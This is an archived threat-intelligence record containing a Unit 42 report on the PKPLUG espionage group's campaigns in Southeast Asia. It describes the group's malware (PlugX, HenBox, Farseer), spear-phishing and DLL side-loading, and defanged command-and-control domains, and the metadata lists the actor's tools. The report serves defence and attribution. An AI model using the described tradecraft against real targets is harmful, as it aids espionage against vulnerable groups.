{ "id": "fe39a813-6283-466b-846e-55fd0345a6f2", "created_at": "2026-04-06T00:09:04.366199Z", "updated_at": "2026-04-10T03:36:33.573686Z", "deleted_at": null, "sha1_hash": "6eb91b46cb6e98fe6f9e4b542d243da97352459f", "title": "PKPLUG: Chinese Cyber Espionage Group Attacking Southeast Asia", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 282716, "plain_text": "PKPLUG: Chinese Cyber Espionage Group Attacking Southeast\r\nAsia\r\nBy Alex Hinchliffe\r\nPublished: 2019-10-03 · Archived: 2026-04-05 20:41:27 UTC\r\nExecutive Summary\r\nFor three years, Unit 42 has tracked a set of cyber espionage attack campaigns across Asia, which used a mix of\r\npublicly available and custom malware. Unit 42 created the moniker “PKPLUG” for the threat actor group, or\r\ngroups, behind these and other documented attacks referenced later in this report. We say group or groups as our\r\ncurrent visibility doesn’t allow us to determine with high confidence if this is the work of one group, or more than\r\none group which uses the same tools and has the same tasking. The name comes from the tactic of delivering\r\nPlugX malware inside ZIP archive files as part of a DLL side-loading package. The ZIP file format contains the\r\nASCII magic-bytes “PK” in its header, hence PKPLUG.\r\nWhile tracking these attackers, Unit 42 discovered additional, mostly custom malware families being used by\r\nPKPLUG beyond that of just PlugX. The additional payloads include HenBox, an Android app, and Farseer, a\r\nWindows backdoor. The attackers also use the 9002 Trojan, which is believed to be shared among a small subset\r\nof attack groups. Other publicly available malware seen in relation to PKPLUG activity includes Poison Ivy and\r\nZupdax.\r\nDuring our investigations and research into these attacks, we were able to relate previous attacks documented by\r\nothers that date back as far back as six years ago. Unit 42 incorporates these findings, together with our own,\r\nunder the moniker PKPLUG and continue to track accordingly.\r\nIt’s not entirely clear as to the ultimate objectives of PKPLUG, but installing backdoor Trojan implants on victim\r\nsystems, including mobile devices, infers tracking victims and gathering information is a key goal.\r\nWe believe victims lay mainly in and around the Southeast Asia region, particularly Myanmar, Taiwan, Vietnam,\r\nand Indonesia; and likely also in various other areas in Asia, such as Tibet, Xinjiang, and Mongolia. Based on\r\ntargeting, content in some of the malware and ties to infrastructure previously documented publicly as being\r\nlinked to Chinese nation-state adversaries, Unit 42 believes with high confidence that PKPLUG has similar\r\norigins.\r\nTargeting\r\nBased on our visibility into PKPLUG’s campaigns and what we’ve learned from collaborating with industry\r\npartners, we believe victims lay mainly in and around the Southeast Asia region. Specifically, the target\r\ncountries/provinces include (with higher confidence), Myanmar and Taiwan as well as (with lower confidence),\r\nVietnam and Indonesia. Other areas in Asia targeted include Mongolia, Tibet and Xinjiang. This blog, and the\r\nassociated Adversary Playbook, provides further details including: the methods used for malware delivery, the\r\nhttps://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/\r\nPage 1 of 9\n\nsocial engineering topics of decoy applications and documents and the Command \u0026 Control (C2) infrastructure\r\nthemes.\r\nIndonesia, Myanmar and Vietnam are ASEAN members, contributing towards intergovernmental cooperation in\r\nthe region. Mongolia, specifically the independent country also known as Outer Mongolia, has a long-standing\r\nand complex relationship with the PRC. Tibet and Xinjiang are autonomous regions (AR) of China that tend to be\r\nclassified by China’s ethnic minorities, granted the ability to govern themselves but ultimately answering to the\r\nPeople’s Republic of China (PRC). Tibet and Xinjiang are the only ARs, from five, where the ethnic group\r\nmaintains a majority over other populations.\r\nMost, if not all, of the seven countries or regions, are involved in some way with Beijing's Belt and Road Initiative\r\n(BRI) designed to connect 71 countries across Southeast Asia to Eastern Europe and Africa. The path through\r\nXinjiang is especially important to the BRI’s success, but is more often heard of due to conflicts between the\r\nChinese government and the ethnic Uyghur population. News of the BRI is peppered with stories of success and\r\nfailure, of countries for and against the BRI and of countries pulling out of existing BRI projects.\r\nFurther tensions in the region are attributed to ownership claims over the South China Sea, including fishing\r\nquotas and the yet unproven oil and gas reserves. At least three of the target countries mentioned (Malaysia,\r\nTaiwan and Vietnam) have laid claim to parts of these waters, and some use the area for the vast majority of their\r\ntrade. Foriegn militaries also patrol, attempting to keep the area open.\r\nTaiwan, which isn’t an AR and doesn’t appear to be actively involved with the BRI, has its own long-standing\r\nhistory with the PRC -- a recent $2.2 billion arms sale with the U.S. may exacerbate matters.\r\nTimeline\r\nBefore continuing, it’s worth highlighting our research and others relating to the intrusion set that we refer to as\r\nPKPLUG. This section documents prior work surrounding cyber attacks relating to PKPLUG. The following\r\nfigure illustrates the chronological order of the publications -- highlighting some key findings from each.\r\nAs you can see from the timeline, PKPLUG has been active for six years or more with a variety of targets and\r\nmethods of delivery and compromise.\r\nhttps://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/\r\nPage 2 of 9\n\nFigure 1. Timeline of publications and key findings relating to PKPLUG\r\nPlease note: the dates shown on the horizontal timeline bar in Figure 1 above relate to the publishing date, not the\r\ncampaign dates, although some were fairly close together. As an example to illustrate the difference in dates,\r\nHenBox was discovered in 2018 but has samples ranging from 2015 through to this week. PlugX and Poison Ivy\r\nare still doing the rounds and their use by different groups is well known. Whether they relate to PKPLUG is\r\nanother matter.\r\n#1: In November 2013, Blue Coat Labs published a report describing a case of attacks against Mongolian targets\r\nusing PlugX malware. Like so many other attacks using PlugX over the past decade or more, Blue Coat noted the\r\nDLL side-loading technique used to launch the malicious payload via legitimate, signed applications. Their report\r\nalso documented the group’s use of an exploit against software vulnerabilities in Microsoft Office. In this case,\r\nusing a weaponized Word document saved as a Single File Web Page format -- usually having an mht file\r\nextension -- in order to exploit CVE-2012-0158 to drop and execute a signed WinRAR SFX archive containing\r\nthe side-loading package and PlugX payload. Considering all the malware related to PKPLUG that Unit 42 has\r\nanalyzed, the use of such exploits appears to be less common than a spear-phishing technique making use of social\r\nengineering to lure victims into running their malware.\r\n#2: A report published in April 2016 by Arbor Networks detailed recent cyber attacks using Poison Ivy malware\r\nagainst targets in Myanmar and other countries in Asia over the previous twelve months.\r\nThey noted phishing emails using ASEAN membership, economics and democracy-related topics to weaponize\r\ndocuments delivering the Poison Ivy payloads. While Arbor didn’t know the exact victims, they inferred suspect\r\ntargets based on the content of emails and associated malware. DLL side-loading was also mentioned as the\r\nmethod to install the malware.\r\n#3: Unit 42 published research that reported attacks using the 9002 Trojan delivered through Google Drive. The\r\ndownload originated with a spear-phishing email containing a shortened URL that redirected multiple times before\r\nhttps://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/\r\nPage 3 of 9\n\ndownloading a ZIP file hosted on Google Drive. The redirection using HTTP also contains information about the\r\nvictim who received the spear-phish and clicked the link. In this case, the information related to a well-known\r\npolitician and human rights activist in Myanmar. The filename of the ZIP archive also related to initiatives in the\r\ncountry, as did the decoy document contents. The ZIP file contained a DLL side-loading package abusing a Real\r\nPlayer executable signed by RealNetworks, Inc. in order to load the 9002 payload.\r\n#4: In March 2017, researchers published a report in Japanese (later translated into English) that described attacks\r\nseen by VKRL -- a Hong Kong-based cybersecurity company -- that were using spear-phishing emails with URLs\r\nusing GeoCities Japan to deliver malware. The content of the website contained encoded VBScript that executed\r\nPowerShell commands to download a Microsoft Word document from the same GeoCities site, as well as another\r\nencoded PowerShell script closely resembling PowerSploit -- a PowerShell post-exploitation framework for\r\npentesters that’s available on GitHub -- that was responsible for decoding and launching a Poison Ivy payload.\r\nAnother GeoCities account was found hosting similar packages, including one targeting Mongolia based on the\r\ncontents of the decoy documents. The contents of the file, assuming a victim clicked on the URL in the spear-phishing email, resembles the structure used in a technique known as AppLocker Bypass whereby trusted\r\nWindows executables can be used to execute malicious payloads.\r\n#5: In early 2018, Unit 42 discovered a new Android malware family that we named “HenBox” and is tracking\r\nover 400 related samples dating back as far as late 2015, and continuing to present day. HenBox often\r\nmasquerades as legitimate Android apps and appears to primarily target the Uyghurs -- a minority Turkic ethnic\r\ngroup that is primarily Muslim and lives mainly in the Xinjiang Uyghur Autonomous Region in Northwest China\r\nand also targets devices made by Chinese manufacturer Xiaomi.\r\nSmartphones are the dominant form of internet access in the region and hence make good targets for such\r\nmalware. Once installed, HenBox steals information from a myriad of sources on the device including harvesting\r\noutgoing phone calls to numbers with an “+86” prefix -- the country code for the PRC -- and accessing the device\r\nmicrophone and cameras.\r\nDuring investigations, data revealed an older version of HenBox had been downloaded from the uyghurapps[.]net\r\nwebsite, which appears to be third-party Android app store serving the Uyghur community based on the domain\r\nname, language of the site and app content hosted. HenBox was masquerading as an another app -- DroidVPN --\r\nwhich was also embedded within HenBox and installed post-infection.\r\n#6: Based on further investigations and pivoting around HenBox infrastructure, Unit 42 discovered a previously-unknown Windows backdoor Trojan called Farseer. Farseer also uses the DLL side-loading technique to install\r\npayloads -- this time favoring a signed Microsoft executable from VisualStudio to appear benign. A VBScript\r\ncomponent is used, via a registry persistence hook, to launch the Microsoft executable and the Farseer payload\r\nduring the user login process. In earlier Farseer variants, we saw decoy documents being used, including one case\r\nof a PDF containing a news article relating to Myanmar. Mongolia also appears to be a target based on telemetry\r\nprovided by an industry partner of ours.\r\nFurther information relating to these publications, together with respective Indicators of Compromise (IoC) and\r\nTactics, Techniques and Procedures (TTPs) used, are available in the PKPLUG Adversary Playbook.\r\nhttps://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/\r\nPage 4 of 9\n\nTying It All Together\r\nThe following Maltego image shows the vast majority of known infrastructure and some of the known malware\r\nsamples related to PKPLUG, and the chart continues to grow as we discover more about this adversary. The\r\nindexed shapes that overlay the figure provide a reference back to the published work chronology mentioned\r\nabove.\r\nhttps://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/\r\nPage 5 of 9\n\nFigure 2. PKPLUG Maltego diagram highlighting published research\r\nOverlaps between the different campaigns documented, and the malware families used in them, exist both in\r\ninfrastructure (domain names and IP addresses being reused, sometimes in multiple cases) and in terms of\r\nhttps://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/\r\nPage 6 of 9\n\nmalicious traits (program runtime behaviors or static code characteristics are also where relationships can be\r\nfound or strengthened).\r\nFigure 3 below shows a very simplified view of the six core publications again, as per Figure 2 above, but with\r\ntrimmed-down infrastructure to highlight some of the core overlaps.\r\nFigure 3. Simplified Maltego diagram showing high-level ties\r\nThe C2 infrastructure blogged by Blue Coat Labs in their publication (#1) “PlugX used against Mongolian\r\ntargets” included ppt.bodologetee[.]com has infrastructure ties microsoftwarer[.]com through a shared IPv4 with\r\nparent domain bodologetee[.]com. Domain microsoftwarer[.]com was found after threat hunting based on facts\r\nprovided in publication (#4) “\"FHAPPI” Campaign: FreeHosting APT PowerSploit Poison Ivy” in relation to the\r\nFHAPPI campaign.\r\nThe FHAPPI campaign (#4) was documented as using PowerShell and PowerSploit code in order to infect victims\r\nwith Poison Ivy, but very similar code was also found around PlugX malware, some of which had C2\r\ncommunication with logitechwkgame[.]com. Domain logitechwkgame[.]com was documented by Unit 42 in\r\npublication (#3) “Attack Delivers 9002 Trojan Through Google Drive” as the C2 for the 9002 Trojans analyzed.\r\nFHAPPI is also connected through another malware using C2 infrastructure that relates, through a shared IPv4\r\naddress, to microsoftdefence[.]com, which malware documented in Arbor Networks’ publication (#2) “Poison Ivy\r\nActivity Targeting Myanmar, Asian Countries” also used for C2 communication. Other Poison Ivy samples also\r\nrelated to the campaigns documented by Arbor Networks used domain webserver.servehttp[.]com for C2\r\ncommunication. Said samples also shared overlaps in runtime characteristics with other Poison Ivy samples that\r\nhave been analyzed and confirmed as having C2 communications with certain domains that relate to both Blue\r\nCoat Labs’ publication (#1) and Unit 42’s research into Farseer malware and their publication (#6) “Farseer:\r\nhttps://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/\r\nPage 7 of 9\n\nPreviously Unknown Malware Family bolsters the Chinese armoury”. Domains include yahoomesseges[.]com and\r\nouthmail[.]com, tcpdo[.]net, queryurl[.]com and cdncool[.]com respectively. The same registrant of\r\nyahoomesseges[.]com - mongolianews@yahoo[.]com - also registered ppt.bodologetee[.]com mentioned slightly\r\nearlier.\r\nSome HenBox malware has used domain cdncool[.]com as well for its C2 communications, as documented in\r\nUnit 42’s publication (#5) “The Chickens Come Home to Roost.” Domain cdncool[.]com is thus connected not\r\nonly to HenBox and Farseer campaigns, but also, through Poison Ivy malware, to the campaigns documented by\r\nBlue Coat Labs and Arbor Networks. HenBox is also connected through a third-level domain\r\nupdate.queryurl[.]com to queryurl[.]com that has been used for C2 communications by some Farseer samples.\r\nOther overlaps, mainly in infrastructure also exist (as seen in Figure 2 above) but are difficult to describe in a blog\r\nlike this, hence using Maltego. Figure 3, as mentioned earlier, is a simplified diagram to highlight some core\r\noverlaps.\r\nPKPLUG’s Adversary Playbook\r\nUnit 42 has previously described and published Adversary Playbooks you can view using our Playbook Viewer.\r\nTo recap briefly, Adversary Playbooks provide a Threat Intelligence package in STIX 2.0 that include all IoCs for\r\nknown attacks by a given adversary. In addition, said packages also include structured information about attack\r\ncampaigns and adversary behaviours -- their TTPs) -- described using Mitre’s ATT\u0026CK framework.\r\nThe Adversary Playbook for PKPLUG can be viewed here, and the STIX 2.0 content behind that can be\r\ndownloaded from here. The Playbook contains several Plays (aka campaigns; instances of the Attack Lifecycle)\r\nthat map, for the most part, to published research previously mentioned in this blog. There exists Plays including\r\nspecific details from publications by Blue Coat Labs, Arbor Networks, our publication on the 9002 Trojan, and the\r\nFHAPPI campaign. HenBox has two Plays -- one for the known attack compromising a third-party app store to\r\ndeliver the malware and another containing all other HenBox data. A similar single campaign exists for Farseer\r\ncontaining all related data.\r\nConclusion\r\nEstablishing a clear picture and understanding about a threat group, or groups, is virtually impossible without total\r\nvisibility into every one of their attack campaigns. Based on this, applying a handle or moniker to a set of related\r\ndata -- such as network infrastructure, malware behavior, actor TTPs relating to delivery, exfiltration, etc. -- helps\r\nus to better understand what it is we’re investigating. Sharing this information -- with a handle, in this case\r\nPKPLUG -- especially in a structured, codified manner a la Adversary Playbooks, should allow others to\r\ncontribute their vantage points and enrich said data until the understanding of a threat group becomes lucid.\r\nBased on what we know and what we’ve gleaned from others’ publications, and through industry sharing,\r\nPKPLUG is a threat group, or groups, operating for at least the last six years using several malware families --\r\nsome more well-known: Poison Ivy, PlugX, and Zupdax; some are less well-known: 9002, HenBox, and Farseer.\r\nUnit 42 has been tracking the adversary for three years and based on public reporting believes with high\r\nconfidence that it has origins to Chinese nation-state adversaries. PKPLUG targets various countries or provinces\r\nhttps://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/\r\nPage 8 of 9\n\nin and around the Southeast Asia region for multiple possible reasons as mentioned above, including some\r\ncountries that are members of the ASEAN organisation, some regions that are autonomous to China, some\r\ncountries and regions somewhat involved with China’s Belt and Road Initiative, and finally, some countries that\r\nare embroiled in ownership claims over the South China Sea.\r\nThe Playbook Viewer helps to highlight some of the more common TTPs used by PKPLUG but, based on our\r\nvisibility, spear-phishing emails to deliver payloads to their victims is very popular. Some email attachments\r\ncontained exploits taking advantage of vulnerable Microsoft Office applications, however this technique was less\r\ncommonly used compared with social engineering to lure the victim into opening attachments. DLL side-loading\r\nseems almost ubiquitous as a method to install or run their payloads, though perhaps more recently, PowerShell\r\nand PowerSploit is also being considered. Other TTPs are described in the STIX 2.0 package and presented in the\r\nViewer.\r\nThe use of Android malware shows intent to get at targets where perhaps traditional computers, operating systems\r\nand ways of communicating are different from previous targets.\r\nPalo Alto Networks detects customers are protected by these threats through the following:\r\nCustomers using AutoFocus can view this activity by using the following tags:\r\nPKPlug\r\nAll malware identified are detected as malicious by WildFire and Traps\r\nPalo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report\r\nwith our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections\r\nto their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat\r\nAlliance, visit www.cyberthreatalliance.org.\r\nIndicators of Compromise\r\nIndicators of compromise relating to PKPLUG can be found in the Adversary Playbook through the Playbook\r\nViewer itself, or indirectly from the STIX 2.0 JSON file powering it.\r\nSource: https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/\r\nhttps://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/" ], "report_names": [ "pkplug_chinese_cyber_espionage_group_attacking_asia" ], "threat_actors": [ { "id": "93542ae8-73cb-482b-90a3-445a20663f15", "created_at": "2022-10-25T16:07:24.058412Z", "updated_at": "2026-04-10T02:00:04.853499Z", "deleted_at": null, "main_name": "PKPLUG", "aliases": [ "Stately Taurus" ], "source_name": "ETDA:PKPLUG", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "926dcfeb-19dd-4786-b601-3c0c4c477b43", "created_at": "2023-01-06T13:46:38.787762Z", "updated_at": "2026-04-10T02:00:03.10053Z", "deleted_at": null, "main_name": "HenBox", "aliases": [], "source_name": "MISPGALAXY:HenBox", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2ee03999-5432-4a65-a850-c543b4fefc3d", "created_at": "2022-10-25T16:07:23.882813Z", "updated_at": "2026-04-10T02:00:04.776949Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Bronze President", "Camaro Dragon", "Earth Preta", "G0129", "Hive0154", "HoneyMyte", "Mustang Panda", "Operation SMUGX", "Operation SmugX", "PKPLUG", "Red Lich", "Stately Taurus", "TEMP.Hex", "Twill Typhoon" ], "source_name": "ETDA:Mustang Panda", "tools": [ "9002 RAT", "AdFind", "Agent.dhwf", "Agentemis", "CHINACHOPPER", "China Chopper", "Chymine", "ClaimLoader", "Cobalt Strike", "CobaltStrike", "DCSync", "DOPLUGS", "Darkmoon", "Destroy RAT", "DestroyRAT", "Farseer", "Gen:Trojan.Heur.PT", "HOMEUNIX", "Hdump", "HenBox", "HidraQ", "Hodur", "Homux", "HopperTick", "Hydraq", "Impacket", "Kaba", "Korplug", "LadonGo", "MQsTTang", "McRAT", "MdmBot", "Mimikatz", "NBTscan", "NetSess", "Netview", "Orat", "POISONPLUG.SHADOW", "PUBLOAD", "PVE Find AD Users", "PlugX", "Poison Ivy", "PowerView", "QMAGENT", "RCSession", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Sogu", "TIGERPLUG", "TONEINS", "TONESHELL", "TVT", "TeamViewer", "Thoper", "TinyNote", "WispRider", "WmiExec", "XShellGhost", "Xamtrav", "Zupdax", "cobeacon", "nbtscan", "nmap", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434144, "ts_updated_at": 1775792193, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6eb91b46cb6e98fe6f9e4b542d243da97352459f.pdf", "text": "https://archive.orkl.eu/6eb91b46cb6e98fe6f9e4b542d243da97352459f.txt", "img": "https://archive.orkl.eu/6eb91b46cb6e98fe6f9e4b542d243da97352459f.jpg" } }